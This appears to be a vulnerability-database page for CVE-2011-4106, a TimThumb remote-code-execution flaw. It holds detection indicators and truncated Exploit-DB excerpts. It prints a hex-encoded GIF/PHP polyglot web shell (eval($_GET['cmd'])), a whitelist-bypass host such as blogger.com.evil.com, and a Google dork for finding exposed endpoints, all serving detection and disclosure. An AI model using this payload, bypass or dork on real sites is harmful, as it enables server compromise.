CVE-2011-4106
published 2013-10-26CVE-2011-4106: TimThumb (timthumb.php) before 2.0 does not validate the entire source with the domain white list, which allows remote attackers to upload and execute…
PriorityP275medium6.8CVSS 2.0
AVNACMAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
23.16%
97.5th percentile
TimThumb (timthumb.php) before 2.0 does not validate the entire source with the domain white list, which allows remote attackers to upload and execute arbitrary code via a URL containing a white-listed domain in the src parameter, then accessing it via a direct request to the file in the cache directory, as exploited in the wild in August 2011.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| binarymoon | timthumb | <= 1.99 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
- →Monitor HTTP requests to timthumb.php (and aliases such as thumb.php, picsize.php, image.php) where the `src` GET parameter contains a subdomain-crafted URL embedding a whitelisted domain (e.g., blogger.com.evil.com) to bypass the domain whitelist check. ↗
- →Alert on newly created .php files inside WordPress cache directories (e.g., wp-content/*/cache/*.php, wp-content/uploads/*/cache/*.php) — these are the webshells dropped by the exploit. ↗
- →Detect the malicious polyglot payload: a GIF89a header (bytes 47 49 46 38 39 61) immediately followed by PHP eval($_GET['cmd']) code (bytes 3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 47 45 54 5B 27 63 6D 64 27 5D 29 3B 20 3F 3E) in files fetched remotely by timthumb. ↗
- →For the User Avatar plugin variant, watch for requests supplying an attacker-controlled `allowedSites[]` parameter alongside a crafted `src` URL, which requires register_globals to be enabled. ↗
- →For the Rekt Slideshow plugin, the src parameter value is Base64-encoded before being passed to picsize.php — decode Base64 values in the src parameter when inspecting requests to this endpoint. ↗
- →Use the Google dork `inurl:timthumb ext:php -site:googlecode.com -site:google.com` to identify exposed timthumb.php endpoints on internet-facing WordPress installations. ↗
- ·Only TimThumb versions 1.x through 1.32 cache the remote file as a .php file; version 1.33 changed the cache filename extension and does not save as .php, limiting direct code execution via the cache path. ↗
- ·The User Avatar plugin exploit variant additionally requires PHP register_globals to be enabled on the server and at least one user account to have an avatar directory. ↗
- ·Cache directory paths vary per plugin and host configuration; the shell drop location must be confirmed per deployment (e.g., external_md5(src).php vs md5(src).php naming differs between plugin versions). ↗
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h589-v7r4-6pgf: TimThumb (timthumb
ghsa_unreviewed·2022-05-17
CVE-2011-4106 [MEDIUM] CWE-20 GHSA-h589-v7r4-6pgf: TimThumb (timthumb
TimThumb (timthumb.php) before 2.0 does not validate the entire source with the domain white list, which allows remote attackers to upload and execute arbitrary code via a URL containing a white-listed domain in the src parameter, then accessing it via a direct request to the file in the cache directory, as exploited in the wild in August 2011.
VulnCheck
binarymoon timthumb Improper Input Validation
vulncheck·2011·CVSS 6.8
CVE-2011-4106 [MEDIUM] binarymoon timthumb Improper Input Validation
binarymoon timthumb Improper Input Validation
TimThumb (timthumb.php) before 2.0 does not validate the entire source with the domain white list, which allows remote attackers to upload and execute arbitrary code via a URL containing a white-listed domain in the src parameter, then accessing it via a direct request to the file in the cache directory, as exploited in the wild in August 2011.
Affected: binarymoon timthumb
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2011-4106; https://www.cve.org/CVERecord?id=CVE-2011-4106; https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/
No detection rules found.
Exploit-DB
Multiple WordPress Plugins - 'timthumb.php' File Upload
exploitdb·2011-09-19
CVE-2011-4106 Multiple WordPress Plugins - 'timthumb.php' File Upload
Multiple WordPress Plugins - 'timthumb.php' File Upload
---
# Exploit Title: Multiple Wordpress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
---
Description
---
The following Wordpress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Reference: http://www.exploit-db.com/exploits/17602/
# Plugin: Category Grid View Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-gr
Exploit-DB
WordPress Plugin TimThumb 1.32 - Remote Code Execution
exploitdb·2011-08-03
CVE-2011-4106 WordPress Plugin TimThumb 1.32 - Remote Code Execution
WordPress Plugin TimThumb 1.32 - Remote Code Execution
---
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
WordPress TimThumb (Theme) Plugin - Remote Code Execution
Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://
No writeups or analysis indexed.
http://code.google.com/p/timthumb/issues/detail?id=212http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/http://www.binarymoon.co.uk/2011/08/timthumb-2/http://www.exploit-db.com/exploits/17602http://www.exploit-db.com/exploits/17872http://www.openwall.com/lists/oss-security/2011/11/03/4http://code.google.com/p/timthumb/issues/detail?id=212http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/http://www.binarymoon.co.uk/2011/08/timthumb-2/http://www.exploit-db.com/exploits/17602http://www.exploit-db.com/exploits/17872http://www.openwall.com/lists/oss-security/2011/11/03/4
2013-10-26
Published
Exploited in the wild